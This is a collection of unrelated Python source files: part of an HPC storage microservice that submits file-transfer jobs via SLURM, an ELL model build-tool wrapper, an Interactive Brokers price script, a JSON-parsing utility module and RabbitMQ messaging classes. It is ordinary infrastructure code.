return jsonify(description="targetPath error"), 400, check_dir["headers"]
sourcePath = ""
actual_command = "rm -rf -- "
else:
return jsonify(error=f"Command {command} not allowed"), 400
# don't add tracing ID, we'll be executed by srun
actual_command = f"{actual_command} '{sourcePath}' '{targetPath}'"
jobName = request.form.get("jobName", "") # jobName for SLURM
if jobName == "":
jobName = command + "-job"
app.logger.info(f"jobName not found, setting default to: {jobName}")
else:
v = validate_input(jobName)
if v != "":
return jsonify(description="Invalid jobName", error=f"'jobName' {v}"), 400
try:
jobTime = request.form["time"] # job time, default is 2:00:00 H:M:s
if not job_time.check_jobTime(jobTime):
return jsonify(error="Not supported time format"), 400
except:
jobTime = "02:00:00"
stageOutJobId = request.form.get("stageOutJobId", None) # start after this JobId has finished
if stageOutJobId != None:
v = validate_input(stageOutJobId)
if v != "":
return jsonify(description="Invalid stageOutJobId", error=f"'stageOutJobId' {v}"), 400
# select index in the list corresponding with machine name
system_idx = SYSTEMS_PUBLIC.index(STORAGE_JOBS_MACHINE)
system_addr = SYS_INTERNALS[system_idx]
app.logger.info(f"USE_SLURM_ACCOUNT: {USE_SLURM_ACCOUNT}")
# get "account" parameter, if not found, it is obtained from "id" command
try:
account = request.form["account"]
v = validate_input(account)
if v != "":
return jsonify(description="Invalid account", error=f"'account' {v}"), 400
except:
if USE_SLURM_ACCOUNT:
username = get_username(headers[AUTH_HEADER_NAME])
id_command = f"ID={ID} timeout {UTILITIES_TIMEOUT} id -gn -- {username}"
resp = exec_remote_command(headers, STORAGE_JOBS_MACHINE, system_addr, id_command)
if resp["error"] != 0:
retval = check_command_error(resp["msg"], resp["error"], f"{command} job")
return jsonify(description=f"Failed to submit {command} job", error=retval["description"]), retval["status_code"], retval["header"]
account = resp["msg"]
else:
account = None
# check if machine is accessible by user:
# exec test remote command
resp = exec_remote_command(headers, STORAGE_JOBS_MACHINE, system_addr, f"ID={ID} true")
if resp["error"] != 0:
error_str = resp["msg"]
if resp["error"] == -2:
header = {"X-Machine-Not-Available": "Machine is not available"}
return jsonify(description=f"Failed to submit {command} job"), 400, header
if in_str(error_str,"Permission") or in_str(error_str,"OPENSSH"):
header = {"X-Permission-Denied": "User does not have permissions to access machine or path"}
return jsonify(description=f"Failed to submit {command} job"), 404, header
retval = exec_internal_command(headers, actual_command, jobName, jobTime, stageOutJobId, account)
# returns "error" key or "success" key
try:
error = retval["error"]
errmsg = retval["msg"]
desc = retval["desc"]
# headers values cannot contain "\n" strings
return jsonify(error=desc), 400, {"X-Sbatch-Error": errmsg}
except KeyError:
success = retval["success"]
task_id = retval["task_id"]
return jsonify(success=success, task_id=task_id), 201
# function to call SBATCH in --partition=xfer
# uses Jobs microservice API call: POST http://{compute_url}/{machine}
# all calls to cp, mv, rm or rsync are made using Jobs us.
def create_xfer_job(machine, headers, fileName):
files = {'file': open(fileName, 'rb')}
try:
headers["X-Machine-Name"] = machine
req = requests.post(f"{COMPUTE_URL}/jobs/upload",
files=files, headers=headers, verify=(SSL_CRT if USE_SSL else False))
retval = json.loads(req.text)
if not req.ok:
return {"error":1,"msg":retval["description"],"desc":retval["error"]}
return retval
except Exception as e:
app.logger.error(e)
return {"error":1,"msg":e}
@app.route("/status",methods=["GET"])
def status():
app.logger.info("Test status of service")
# TODO: check backend storage service to truthfully respond this request
return jsonify(success="ack"), 200
def create_staging():
# Object Storage object
global staging
staging = None
if OBJECT_STORAGE == "swift":
app.logger.info("Object Storage selected: SWIFT")
from swiftOS import Swift
# Object Storage URL & data:
SWIFT_PRIVATE_URL = os.environ.get("F7T_SWIFT_PRIVATE_URL")
SWIFT_PUBLIC_URL = os.environ.get("F7T_SWIFT_PUBLIC_URL")
SWIFT_API_VERSION = os.environ.get("F7T_SWIFT_API_VERSION")
SWIFT_ACCOUNT = os.environ.get("F7T_SWIFT_ACCOUNT")
SWIFT_USER = os.environ.get("F7T_SWIFT_USER")
SWIFT_PASS = os.environ.get("F7T_SWIFT_PASS")
priv_url = f"{SWIFT_PRIVATE_URL}/{SWIFT_API_VERSION}/AUTH_{SWIFT_ACCOUNT}"
publ_url = f"{SWIFT_PUBLIC_URL}/{SWIFT_API_VERSION}/AUTH_{SWIFT_ACCOUNT}"
staging = Swift(priv_url=priv_url,publ_url=publ_url, user=SWIFT_USER, passwd=SWIFT_PASS, secret=SECRET_KEY)
elif OBJECT_STORAGE == "s3v2":
app.logger.info("Object Storage selected: S3v2")
from s3v2OS import S3v2
# For S3:
S3_PRIVATE_URL = os.environ.get("F7T_S3_PRIVATE_URL")
S3_PUBLIC_URL = os.environ.get("F7T_S3_PUBLIC_URL")
S3_ACCESS_KEY = os.environ.get("F7T_S3_ACCESS_KEY")
S3_SECRET_KEY = os.environ.get("F7T_S3_SECRET_KEY")
staging = S3v2(priv_url=S3_PRIVATE_URL, publ_url=S3_PUBLIC_URL, user=S3_ACCESS_KEY, passwd=S3_SECRET_KEY)
elif OBJECT_STORAGE == "s3v4":
app.logger.info("Object Storage selected: S3v4")
from s3v4OS import S3v4
# For S3:
S3_PRIVATE_URL = os.environ.get("F7T_S3_PRIVATE_URL")
S3_PUBLIC_URL = os.environ.get("F7T_S3_PUBLIC_URL")
S3_ACCESS_KEY = os.environ.get("F7T_S3_ACCESS_KEY")
S3_SECRET_KEY = os.environ.get("F7T_S3_SECRET_KEY")
staging = S3v4(priv_url=S3_PRIVATE_URL, publ_url=S3_PUBLIC_URL, user=S3_ACCESS_KEY, passwd=S3_SECRET_KEY)
else:
app.logger.warning("No Object Storage for staging area was set.")
def get_upload_unfinished_tasks():
# cleanup upload dictionary
global uploaded_files
uploaded_files = {}
app.logger.info(f"Staging Area Used: {staging.priv_url} - ObjectStorage Technology: {staging.get_object_storage()}")
try:
# query Tasks microservice for previous tasks. Allow 30 seconds to answer
# only unfinished upload process
status_code = [async_task.ST_URL_ASK, async_task.ST_URL_REC, async_task.ST_UPL_CFM, async_task.ST_DWN_BEG, async_task.ST_DWN_ERR]
retval=requests.get(f"{TASKS_URL}/taskslist", json={"service": "storage", "status_code":status_code}, timeout=30, verify=(SSL_CRT if USE_SSL else False))
if not retval.ok:
app.logger.error("Error getting tasks from Tasks microservice: query failed with status {retval.status_code}, STORAGE microservice will not be fully functional. Next try will be in {STORAGE_POLLING_INTERVAL} seconds")
return
queue_tasks = retval.json()
# queue_tasks structure: "tasks"{
# task_{id1}: {..., data={} }
# task_{id2}: {..., data={} } }
# data is the field containing every
queue_tasks = queue_tasks["tasks"]
n_tasks = 0
for key,task in queue_tasks.items():
task = json.loads(task)
# iterating over queue_tasls
try:
data = task["data"]
# check if task is a non ending /xfer-external/upload downloading
# from SWIFT to filesystem and it crashed before download finished,
# so it can be re-initiated with /xfer-external/upload-finished
# In that way it's is marked as erroneous
if task["status"] == async_task.ST_DWN_BEG:
task["status"] = async_task.ST_DWN_ERR
task["description"] = "Storage has been restarted, process will be resumed"
headers = {}
headers[TRACER_HEADER] = data['trace_id']
update_task(task["hash_id"], headers, async_task.ST_DWN_ERR, data, is_json=True)
uploaded_files[task["hash_id"]] = data
n_tasks += 1
except KeyError as e:
app.logger.error(e)
app.logger.error(task["data"])
app.logger.error(key)
except Exception as e:
app.logger.error(data)
app.logger.error(e)
app.logger.error(type(e))
app.logger.info(f"Not finished upload tasks recovered from taskpersistance: {n_tasks}")
except Exception as e:
app.logger.warning("Error querying TASKS microservice: STORAGE microservice will not be fully functional")
app.logger.error(e)
@app.before_request
def f_before_request():
new_headers = {}
if JAEGER_AGENT != "":
try:
jaeger_tracer.inject(tracing.get_span(request), opentracing.Format.TEXT_MAP, new_headers)
except Exception as e:
logging.error(e)
g.TID = new_headers.get(TRACER_HEADER, '')
@app.after_request
def after_request(response):
# LogRequestFormatetter is used, this messages will get time, thread, etc
logger.info('%s %s %s %s %s', request.remote_addr, request.method, request.scheme, request.full_path, response.status)
return response
def init_storage():
# should check Tasks tasks than belongs to storage
create_staging()
get_upload_unfinished_tasks()
if __name__ == "__main__":
LOG_PATH = os.environ.get("F7T_LOG_PATH", '/var/log').strip('\'"')
# timed rotation: 1 (interval) rotation per day (when="D")
logHandler = TimedRotatingFileHandler(f'{LOG_PATH}/storage.log', when='D', interval=1)
logFormatter = LogRequestFormatter('%(asctime)s,%(msecs)d %(thread)s [%(TID)s] %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
'%Y-%m-%dT%H:%M:%S')
logHandler.setFormatter(logFormatter)
# get app log (Flask+werkzeug+python)
logger = logging.getLogger()
# set handler to logger
logger.addHandler(logHandler)
logging.getLogger().setLevel(logging.INFO)
# checks QueuePersistence and retakes all tasks
init_storage()
# aynchronously checks uploaded_files for complete download to FS
upload_check = threading.Thread(target=check_upload_files, name='storage-check-upload-files')
upload_check.start()
if USE_SSL:
app.run(debug=debug, host='0.0.0.0', use_reloader=False, port=STORAGE_PORT, ssl_context=(SSL_CRT, SSL_KEY))
else:
app.run(debug=debug, host='0.0.0.0', use_reloader=False, port=STORAGE_PORT)
|
buildtools.py
|
####################################################################################################
##
## Project: Embedded Learning Library (ELL)
## File: buildtools.py
## Authors: Chris Lovett, Kern Handa
##
## Requires: Python 3.x
##
####################################################################################################
import json
import os
import sys
sys.path += [os.path.dirname(os.path.abspath(__file__)) ]
import logger
import subprocess
from threading import Thread, Lock
class EllBuildToolsRunException(Exception):
def __init__(self, cmd, output=""):
Exception.__init__(self, cmd)
self.cmd = cmd
self.output = output
class EllBuildTools:
def __init__(self, ell_root, verbose = False):
self.verbose = verbose
self.ell_root = ell_root
self.build_root = None
self.compiler = None
self.swigexe = None
self.llcexe = None
self.optexe = None
self.blas = None
self.logger = logger.get()
self.output = None
self.lock = Lock()
self.find_tools()
def get_ell_build(self):
if not self.build_root:
import find_ell
self.build_root = find_ell.find_ell_build()
return self.build_root
def find_tools(self):
build_root = self.get_ell_build()
if not os.path.isdir(build_root):
raise Exception("Could not find '%s', please make sure to build the ELL project first" % (build_root))
ell_tools_json = "ell_build_tools.json"
jsonPath = os.path.join(build_root, ell_tools_json)
if not os.path.isfile(jsonPath):
raise Exception("Could not find build output: " + jsonPath)
with open(jsonPath) as f:
self.tools = json.loads(f.read())
self.compiler = self.tools['compile']
if self.compiler == "":
raise Exception(ell_tools_json + " is missing compiler info")
self.swigexe = self.tools['swig']
if self.swigexe == "":
raise Exception(ell_tools_json + " is missing swig info")
self.llcexe = self.tools['llc']
if self.llcexe == "":
raise Exception(ell_tools_json + " is missing llc info")
self.optexe = self.tools['opt']
if self.optexe == "":
raise Exception(ell_tools_json + " is missing opt info")
if ("blas" in self.tools):
self.blas = self.tools['blas'] # this one can be empty.
def logstream(self, stream):
try:
while True:
out = stream.readline()
if out:
self.lock.acquire()
try:
self.output += out
msg = out.rstrip('\n')
if self.verbose:
self.logger.info(msg)
finally:
self.lock.release()
else:
break
except:
errorType, value, traceback = sys.exc_info()
msg = "### Exception: %s: %s" % (str(errorType), str(value))
if not "closed file" in msg:
self.logger.info(msg)
def run(self, command, print_output=True, shell=False):
cmdstr = command if isinstance(command, str) else " ".join(command)
if self.verbose:
self.logger.info(cmdstr)
try:
with subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=0, universal_newlines = True, shell=shell
) as proc:
self.output = ''
stdout_thread = Thread(target=self.logstream, args=(proc.stdout,))
stderr_thread = Thread(target=self.logstream, args=(proc.stderr,))
stdout_thread.start()
stderr_thread.start()
while stdout_thread.isAlive() or stderr_thread.isAlive():
pass
proc.wait()
if proc.returncode:
self.logger.error("command {} failed with error code {}".format(command[0], proc.returncode))
raise EllBuildToolsRunException(cmdstr, self.output)
return self.output
except FileNotFoundError:
raise EllBuildToolsRunException(cmdstr)
def swig_header_dirs(self):
return [os.path.join(self.ell_root, d) for d in [
'interfaces/common',
'interfaces/common/include',
'libraries/emitters/include'
]]
def swig(self, output_dir, model_name, language):
# swig -python -modern -c++ -Fmicrosoft -py3 -outdir . -c++ -I%ELL_ROOT%/interfaces/common/include -I%ELL_ROOT%/interfaces/common -I%ELL_ROOT%/libraries/emitters/include -o _darknetReferencePYTHON_wrap.cxx darknetReference.i
args = [self.swigexe,
'-' + language,
'-c++',
'-Fmicrosoft']
if language == "python":
args = args + ["-py3"]
if language == "javascript":
args = args + ["-v8"]
args = args + ['-outdir', output_dir] + ['-I' + d for d in self.swig_header_dirs()] + [
'-o', os.path.join(output_dir, model_name + language.upper() + '_wrap.cxx'),
os.path.join(output_dir, model_name + ".i")
]
self.logger.info("generating " + language + " interfaces for " + model_name + " in " + output_dir)
return self.run(args)
def get_llc_options(self, target):
common = ["-filetype=obj"]
# arch processing
if target == "pi3": # Raspberry Pi 3
return common + ["-mtriple=armv7-linux-gnueabihf", "-mcpu=cortex-a53", "-relocation-model=pic"]
if target == "orangepi0": # Orange Pi Zero
return common + ["-mtriple=armv7-linux-gnueabihf", "-mcpu=cortex-a7", "-relocation-model=pic"]
elif target == "pi0": # Raspberry Pi Zero
return common + ["-mtriple=arm-linux-gnueabihf", "-mcpu=arm1176jzf-s", "-relocation-model=pic"]
elif target == "aarch64" or target == "pi3_64": # arm64 Linux
return common + ["-mtriple=aarch64-unknown-linux-gnu", "-relocation-model=pic"]
else: # host
return common + ["-relocation-model=pic"]
def llc(self, output_dir, input_file, target, optimization_level="3", objext=".o"):
# llc -filetype=obj _darknetReference.ll -O3 -mtriple=armv7-linux-gnueabihf -mcpu=cortex-a53 -relocation-model=pic
model_name = os.path.splitext(os.path.basename(input_file))[0]
if model_name.endswith('.opt'):
model_name = model_name[:-4]
out_file = os.path.join(output_dir, model_name + objext)
args = [self.llcexe,
input_file,
"-o", out_file,
"-O" + optimization_level
]
args = args + self.get_llc_options(target)
self.logger.info("running llc ...")
self.run(args)
return out_file
def opt(self, output_dir, input_file, optimization_level="3"):
# opt compiled_model.ll -o compiled_model_opt.ll -O3
model_name = os.path.splitext(os.path.basename(input_file))[0]
out_file = os.path.join(output_dir, model_name + ".opt.bc")
args = [self.optexe,
input_file,
"-o", out_file,
"-O" + optimization_level
]
self.logger.info("running opt ...")
self.run(args)
return out_file
def compile(self, model_file, func_name, model_name, target, output_dir,
use_blas=False, fuse_linear_ops=True, optimize_reorder_data_nodes=True, profile=False, llvm_format="bc",
optimize=True, debug=False, is_model_file=False, swig=True, header=False,
objext=".o", extra_options=[]):
file_arg = "-imf" if is_model_file else "-imap"
format_flag = {
"bc": "--bitcode",
"ir": "--ir",
"asm": "--assembly",
"obj": "--objectCode"
}[llvm_format]
output_ext = {
"bc": ".bc",
"ir": ".ll",
"asm": ".s",
"obj": objext
}[llvm_format]
model_file_base = os.path.splitext(os.path.basename(model_file))[0]
out_file = os.path.join(output_dir, model_file_base + output_ext)
args = [self.compiler,
file_arg, model_file,
"-cfn", func_name,
"-cmn", model_name,
format_flag,
"--target", target,
"-od", output_dir,
"--fuseLinearOps", str(fuse_linear_ops),
"--optimizeReorderDataNodes", str(optimize_reorder_data_nodes)
]
if swig:
args.append("--swig")
if header:
args.append("--header")
args.append("--blas")
hasBlas = bool(use_blas)
if target == "host" and hasBlas and not self.blas:
hasBlas = False
args.append(str(hasBlas).lower())
if not optimize:
args += ["--optimize", "false"]
else:
args += ["--optimize", "true"]
if debug:
args += ["--debug", "true"]
if profile:
args.append("--profile")
args += extra_options
self.logger.info("compiling model...")
self.run(args)
return out_file
|
ibalgo.py
|
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from ibapi.contract import Contract
import threading
import time
class IBapi(EWrapper, EClient):
def __init__(self):
EClient.__init__(self, self)
def tickPrice(self, reqId, tickType, price, attrib):
#if tickType == 2 and reqId == 1:
print('The current ask price is: ', price)
def run_loop():
app.run()
app = IBapi()
app.connect('127.0.0.1', 7497, 123)
#Start the socket in a thread
api_thread = threading.Thread(target=run_loop, daemon=True)
api_thread.start()
time.sleep(1) #Sleep interval to allow time for connection to server
#Create contract object
apple_contract = Contract()
apple_contract.symbol = 'AAPL'
apple_contract.secType = 'STK'
apple_contract.exchange = 'SMART'
apple_contract.currency = 'USD'
app.reqMarketDataType(3)
#Request Market Data
app.reqMktData(1, apple_contract, '', False, False, [])
time.sleep(10) #Sleep interval to allow time for incoming price data
app.disconnect()
|
payload.py
|
# -*- coding: utf-8 -*-
"""
peregrine.resources.submission.util
----------------------------------
Provides utility functions for the submission resource.
"""
from collections import Counter
import json
import os
import simplejson
import flask
from flask import current_app as capp
from flask import request
from functools import wraps
from threading import Thread
from peregrine.errors import UserError
from peregrine.resources.submission.constants import (
project_seed,
program_seed,
ERROR_STATE,
FLAG_IS_ASYNC,
submitted_state,
UPLOADING_STATE,
SUCCESS_STATE,
)
def get_external_proxies():
"""Get any custom proxies set in the config.
This is a rather specific use case, but here we want to reach out
to an external resource via a proxy but do not want to set the
proxy environment variable proper.
This value should be added to ``app.config['EXTERNAL_PROXIES']``.
And should look something like
.. codeblock::
{
'http': "http://<http_proxy:port>",
'http': "https://<https_proxy:port>",
}
:returns:
A Dictionary ``{'http': ..., 'https': ...}`` with proxies. If
a certain proxy is not specified, it should be absent from the
dictionary.
"""
return capp.config.get('EXTERNAL_PROXIES', {})
def oph_raise_for_duplicates(object_pairs):
"""Given an list of ordered pairs, contstruct a dict as with the
normal JSON ``object_pairs_hook``, but raise an exception if there
are duplicate keys with a message describing all violations.
"""
counter = Counter(p[0] for p in object_pairs)
duplicates = filter(lambda p: p[1] > 1, counter.iteritems())
if duplicates:
raise ValueError(
'The document contains duplicate keys: {}'
.format(','.join(d[0] for d in duplicates)))
return {
pair[0]: pair[1]
for pair in object_pairs
}
def parse_json(raw):
"""Returns a python representation of a JSON document.
:param str raw: Load this provided string.
:raises: UserError if any exception is raised parsing the JSON body
..note:: Uses :func:`oph_raise_for_duplicates` in parser.
"""
try:
return simplejson.loads(
raw, object_pairs_hook=oph_raise_for_duplicates)
except Exception as e:
raise UserError('Unable to parse json: {}'.format(e))
def parse_request_json(expected_types=(dict, list)):
"""Returns a python representation of a JSON POST body.
:param str raw:
Load this provided string. If raw is not provided, pull the body
from global request object
:raises: UserError if any exception is raised parsing the JSON body
:raises: UserError if the result is not of the expected type
"""
parsed = parse_json(request.get_data())
if not isinstance(parsed, expected_types):
raise UserError('JSON parsed from request is an invalid type: {}'
.format(parsed.__class__.__name__))
return parsed
# def parse_request_yaml():
# """Returns a python representation of a YAML POST body.
# :raises: UserError if any exception is raised parsing the YAML body
# """
# raw = request.get_data()
# try:
# return yaml.safe_load(raw)
# except Exception as e:
# raise UserError('Unable to parse yaml: {}'.format(e))
# def lookup_node(psql_driver, label, node_id=None, secondary_keys=None):
# """Return a query for nodes by id and secondary keys"""
# cls = Node.get_subclass(label)
# query = psql_driver.nodes(cls)
# if node_id is None and not secondary_keys:
# return query.filter(sqlalchemy.sql.false())
# if node_id is not None:
# query = query.ids(node_id)
# if all(all(keys) for keys in secondary_keys):
# query = query.filter(cls._secondary_keys == secondary_keys)
# return query
# def lookup_project(psql_driver, program, project):
# """Return a project by Project.code if attached to Program.name"""
# return (psql_driver.nodes(models.Project).props(code=project)
# .path('programs')
# .props(name=program)
# .scalar())
# def lookup_program(psql_driver, program):
# """Return a program by Program.name"""
# return psql_driver.nodes(models.Program).props(name=program).scalar()
# def get_entities(psql_driver, node_ids):
# """Lookup entities from graph by node_id"""
# query = psql_driver.nodes().ids(node_ids)
# nodes = query.all()
# entities = {n.node_id: n for n in nodes}
# return entities
def parse_boolean(value):
"""Try parse boolean. raises UserError if unable. """
if isinstance(value, bool):
return value
elif value.lower() == 'true':
return True
elif value.lower() == 'false':
return False
else:
raise UserError('Boolean value not one of [true, false]')
def is_flag_set(flag, default=False):
"""Did the user specify the value of a flag (default: False)
Example:
?async=true
Requires request context.
"""
return parse_boolean(request.args.get(flag, default))
def async(f):
"""Decorator to run function in background"""
@wraps(f)
def wrapper(*args, **kwargs):
"""Wrapper for async call"""
thread = Thread(target=f, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
def get_introspection_query():
cur_dir = os.path.dirname(os.path.realpath(__file__))
f = open(os.path.join(cur_dir, 'graphql', 'introspection_query.txt'), 'r')
return f.read()
def json_dumps_formatted(data):
"""Return json string with standard format."""
dump = json.dumps(
data, indent=2, separators=(', ', ': '), ensure_ascii=False
)
return dump.encode('utf-8')
def jsonify_check_errors(data_and_errors, error_code=400):
"""
TODO
"""
data, errors = data_and_errors
if errors:
return flask.jsonify({'data': data, 'errors': errors}), error_code
else:
return flask.jsonify({'data': data}), 200
def get_variables(payload):
var_payload = payload.get('variables')
variables = None
errors = None
if isinstance(var_payload, dict):
variables = var_payload
else:
try:
variables = json.loads(var_payload) if var_payload else {}
except Exception as e:
errors = ['Unable to parse variables', str(e)]
return variables, errors
|
rabbit.py
|
"""
Classes for working with RabbitMQ message queues. Support for three types of
queues is provided.
1. ``MessageQueue`` -- a message queue for implementing the producer/consumer
pattern.
#. ``Broadcaster`` -- used to send messages to all registered listeners.
#. ``MessageBus`` -- used to send messages to a specific listener.
The above classes also have listener classes that users can use to receive
messages.
"""
import pika
import threading
import logging
import config as cfg
from deiis.model import Serializer, JsonObject, Type
PERSIST = pika.BasicProperties(delivery_mode=2)
# Python 3 does not have a basestring type. So on Python 3 we assign the 'str'
# type to 'basestring' so we can test if a variable is a string in Python 2 and 3.
try:
basestring
except:
basestring = str
class Message(JsonObject):
"""
The data model for message that are passed between services.
type -- one of 'route' or 'command'.
body -- the string (message) to be sent.
route -- the list of services the message should be sent to.
Messages of type 'route' should be processed and passed to the next service
in the ``route`` list. Messages of type 'command' and used to send commands
to services, e.g. shutdown.
"""
properties = {
'type': (lambda: 'route'),
'body': Type.text,
'route': list
}
def __init__(self, params=None, **kwargs):
super(Message, self).__init__(params)
for name,value in kwargs.iteritems():
if name in Message.properties:
setattr(self, name, value)
def forward(self):
if len(self.route) == 0:
return None
target = self.route[0]
self.route = self.route[1:]
return target
@staticmethod
def Command(body, route=[]):
return Message(type='command', body=body, route=route)
class MessageBus(object):
"""
Creates a 'direct' exchange named 'message_bus'.
Use a MessageBus instance to send messages to specific listeners on the exchange.
bus = MessageBus()
bus.publish('target', 'Hello world.')
"""
def __init__(self, exchange='message_bus', host=cfg.host):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange=exchange, exchange_type='direct')
self.exchange = exchange
def publish(self, route, message):
if not isinstance(message, basestring):
message = Serializer.to_json(message)
try:
self.channel.basic_publish(exchange=self.exchange, routing_key=route, body=message, properties=PERSIST)
except Exception as e:
logger = logging.getLogger(self.__class__.__name__)
logger.error("Unable to publish the message: %s", e.message)
logger.exception(e.message)
class BusListener(object):
"""
A listener for a specific route on the message_bus exchange.
listener = BusListener('my.address')
listener.start()
# In a different thread.
bus = MessageBus()
# Send a message to the above listener:
bus.publish('my.address', 'Hello world.')
"""
def __init__(self, route, exchange='message_bus', host=cfg.host):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange=exchange, exchange_type='direct')
self.exchange = exchange
self.route = route
result = self.channel.queue_declare(exclusive=True)
self.name = result.method.queue
self.channel.queue_bind(exchange=self.exchange, queue=self.name, routing_key=self.route)
self.logger = logging.getLogger(self.__class__.__name__)
def start(self):
"""Starts listening on the queue. No messages will be delivered to this
listener until the `start` method is called.
This method blocks until another thread calls the `stop` method.
"""
self.channel.start_consuming()
def stop(self):
"""Stops the listener and causes the `start()` method to exit."""
self.logger.debug('Sending basic_cancel')
self.channel.basic_cancel(self.tag)
self.logger.debug('basic_cancel sent')
def register(self, handler):
self.tag = self.channel.basic_consume(handler, queue=self.name)
class Broadcaster(object):
"""
Broadcasts messages to all registered listeners.
Creates a 'fanout' exchange named 'broadcast'.
"""
def __init__(self, exchange='broadcast', host=cfg.host):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange=exchange, exchange_type='fanout')
self.exchange = exchange
def broadcast(self, message):
self.channel.basic_publish(self.exchange, routing_key='*', body=message)
def stop(self):
self.connection.close()
class BroadcastListener(object):
"""
A listener for the 'broadcast' exchange.
"""
def __init__(self, exchange='broadcast', host=cfg.host):
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.exchange_declare(exchange=exchange, exchange_type='fanout')
result = self.channel.queue_declare(exclusive=True)
self.name = result.method.queue
self.channel.queue_bind(exchange=exchange, queue=self.name)
self.tag = False
self.logger = logging.getLogger(self.__class__.__name__)
def register(self, handler):
"""
Register a handler for the exchange.
Note that we do not ack (acknowledge) broadcast messages so there is
no guarantee that the message will be delivered/received.
"""
self.tag = self.channel.basic_consume(handler, queue=self.name, no_ack=True)
def start(self):
"""
Starts the listener.
This method will block until another thread calls the `stop` method.
"""
self.channel.start_consuming()
def stop(self):
"""
Stops the thread and causes the `start` method to terminate.
"""
self.logger.debug('Sending basic_cancel')
self.channel.basic_cancel(self.tag)
self.logger.debug('basic_cancel sent')
class MessageQueue(object):
"""
The MessageQueue class is used for Producer/Consumer scenarios.
Messages will be dealt out to listeners in a round-robin fashion.
"""
def __init__(self, name, host=cfg.host, exchange='', durable=False, fair=False):
self.exchange = exchange
self.connection = pika.BlockingConnection(pika.ConnectionParameters(host))
self.channel = self.connection.channel()
self.channel.queue_declare(name, durable=durable)
self.tag = False
# Set fair=True if multiple consumers are reading from a single queue.
if fair:
self.channel.basic_qos(prefetch_count=1)
self.queue = name
def publish(self, message):
"""Published the message to the queue managed by this instance."""
self.channel.basic_publish(self.exchange, routing_key=self.queue, body=message, properties=PERSIST)
def register(self, handler):
"""Registers the handler as a consumer for the queue managed by this instance."""
self.tag = self.channel.basic_consume(handler, self.queue)
def start(self):
"""Start waiting for messages to arrive on our queue."""
self.channel.start_consuming()
def stop(self):
"""Stop the listener and close the connection."""
self.channel.basic_cancel(self.tag)
self.connection.close()
def ack(self, method):
"""Acknowledge the message."""
self.channel.basic_ack(delivery_tag=method.delivery_tag)
class Consumer(object):
"""
A Consumer receives messages from an input queue and "consumes" them.
What is meant by "consume" depends on what subclasses do in their `work`
methods. However, Consumers do not produce "output" in the sense
that they do not write to an output queue.
"""
def __init__(self, name, input):
self.name = name
self.input_queue = MessageQueue(input)
self.input_queue.register(handler=self._handler)
self.listener = BroadcastListener()
self.listener.register(handler=self._broadcast_handler)
self.thread = False
def _handler(self, channel, method, properties, body):
"""RabbitMQ will call the _handler method when a message arrives on the queue."""
if body == 'HALT':
self.stop()
# Allow Workers to propagate the HALT message to their output_queue.
self.halt()
elif body == 'KILL':
# Stops the input queue but does not propagate the messaes any further.
self.stop()
else:
self.work(body)
# Acknowledge that the message was processed.
channel.basic_ack(delivery_tag=method.delivery_tag)
def _broadcast_handler(self, channel, method, properties, message):
self.broadcast(message)
def broadcast(self, message):
pass
def work(self, message):
"""Subclasses will override the work method to perform their work"""
pass
def halt(self):
"""Overloaded by the Worker class to propagate HALT messages."""
print("Halting consumer " + self.name)
def stop(self):
self.input_queue.stop()
self.listener.stop()
def start(self):
"""Start listening on our input_queue.
MessageQueues are blocking so the start() method will block until another
process cancels the queue by sending a HALT message
"""
print(self.name + " starting")
# The message queues are blocking, so we need to start the broadcast
# listener in its own thread.
def start_listener():
try:
self.listener.start()
except:
pass
self.input_queue.start()
# Once the input_queue has stopped we need to wait for the listener
# thread to terminate as well.
self.thread.join()
print(self.name + " halted.")
class Worker(Consumer):
'''
A `Worker` is a type of `Consumer` that writes its output to an
output message queue.
'''
def __init__(self, name, input, output):
super(Worker, self).__init__(name, input)
self.output_queue = MessageQueue(output)
def write(self, message):
self.output_queue.publish(message)
def halt(self):
self.output_queue.publish('HALT')
print("Halting worker " + self.name)
class Task(object):
"""
The Task classes serves as the base class for services in BioASQ pipelines.
The Task class does all the administrative busy-work needed to manage the
RabbitMQ queues so services only need to implement the `perform` method.
"""
def __init__(self, route):
"""Route is a String containing the unique address for the service."""
self.bus = MessageBus()
self.listener = BusListener(route)
self.listener.register(self._handler)
self.thread = False
self.route = route
self.logger = logging.getLogger(self.__class__.__name__)
def start(self):
"""
Starts the service in a separate Thread.
The thread is started as a daemon so calls to this method don't
block.
"""
def run():
try:
self.logger.debug('Starting the listener')
self.listener.start()
self.logger.debug('listener.start() has exited')
except Exception as e:
self.logger.exception(e.message)
t = threading.Thread(target=run)
t.daemon = True
t.start()
self.thread = t
def _handler(self, channel, method, properties, message):
"""Default message handler that calls the user's `perform` method
and then acknowledges the message.
"""
self.perform(message)
self.ack(method)
def ack(self, method):
"""Shorthand for what is otherwise a really lengthy method call."""
self.listener.channel.basic_ack(delivery_tag=method.delivery_tag)
def stop(self):
"""Stops the listener which will cause the `run` method above to
exit and our thread to terminate.
"""
self.logger.debug('Stopping the listener.')
self.listener.stop()
self.logger.debug('Stopped listeners.')
def wait_for(self):
"""Waits for this task's thread to terminate."""
self.thread.join()
self.logger.debug('Thread %s terminated.', self.__class__.__name__)
def perform(self, input):
"""Services should override this method to handle incoming messages."""
pass
def deliver(self, message):
"""Sends the message to the next target, if any."""
target = message.forward()
if target is not None:
self.logger.debug('Delivering message to %s', target)
self.bus.publish(target, Serializer.to_json(message))
|
plugin.py
|
#!/usr/bin/env/python
# -*- coding: utf-8 -*-
###
# Copyright (c) 2016, Nicolas Coevoet
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
